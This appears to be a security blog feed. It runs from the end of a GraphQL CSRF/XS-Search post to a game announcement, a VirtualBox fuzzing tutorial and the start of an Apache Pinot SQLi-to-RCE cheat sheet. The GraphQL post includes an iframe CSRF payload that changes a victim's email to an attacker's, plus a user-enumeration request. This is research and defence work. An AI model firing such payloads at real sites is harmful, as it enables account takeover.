		<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A%26variables%3D%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%2C%0A%7D"></iframe>
	</body>
</html>

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

urlpatterns = patterns(
    # ...
    url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
)

CSRF: Better Safe Than Sorry

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

  • Built-in CSRF protection in modern frameworks
  • Origin verification
  • Double submit cookies
  • User interaction based protection
  • Not using GET request for state changing operations
  • Enhanced CSRF protection to GET request too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.

Rumbling The XS-Search

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm for their existence/accessibility.

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.

XS-Search is quite a neat and simple technique which can transform the following query in an attacker controlled binary search (eg. we can enumerate the users of a private platform):

query {
	isEmailAvailable(email:"[email protected]") {
		is_email_available
	}
}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

Automate Everything!!!

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

  • By identifying various classes of CSRF through new “Send to Repeater” helpers:

    • GET query parameters
    • POST form-data
    • POST x-form-urlencoded
  • By improving the query generation

shell.showItemInFolder

Something for our beloved number crunchers!

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and no conclusiveness nor completeness should be inferred, numbers show an impressive amount of unpatched vulnerabilities:

  • 14 (~50%) were vulnerable to some kind of XS-Search, equivalent to a GET-based CSRF
  • 3 (~10%) were vulnerable to CSRF

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

References

H1.Jack, The Game

15 February 2022 at 23:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

Introduction to VirtualBox security research

25 April 2022 at 22:00

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the binary VirtualBox from the out/linux.amd64/debug/bin/VirtualBox directory will be created. Before creating our first guest host, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing to selectively enable the logging of specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness, that we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter ones are currently not used, but we can add our own functions and call them, by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use the modified VboxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger class:

IMachineDebugger VM

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VboxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
        PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
        PVM pVM = pUVM->pVM;


        if (SUCCEEDED(hrc)) {

          PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
          PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

In the same file after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, append __AFL_FUZZ_INIT(); before defining the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying the user-controlled data by using access I/O port instructions or reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, after some consideration for the implementing of our fuzzing framework, we discovered Fuzzed Data Provider (later FDP).

FDP is part of the LLVM and, after we pass it a buffer generated by AFL, it can leverage it to generate a restricted set of numbers, bytes, or enums. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some buffer.

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using convenient macro PDMDEVINS_2_DATA. Likewise, we can extend the state structure (in our case PCNETSTATE) to include the FDP header file via a pointer to FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too :

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful and include them inside R3 only parts. The easiest way is to find the R3 constructor and add new code just after that, as it already has defined the IN_RING3 macro for the conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even when we can reach more than 10k executions per second, we still have some work to do about the stability.

Improving Stability

Unfortunately, none of these methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module was dynamically loaded, therefore partially disabling instrumentation was not possible nor was possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References

Apache Pinot SQLi and RCE Cheat Sheet

8 June 2022 at 22:00

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

  • data is being streamed in, and needs to be instantly queryable
  • many users need to perform complicated queries at the same time
  • the queries need to quickly aggregate or filter terabytes of data

Apache Pinot Overview

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

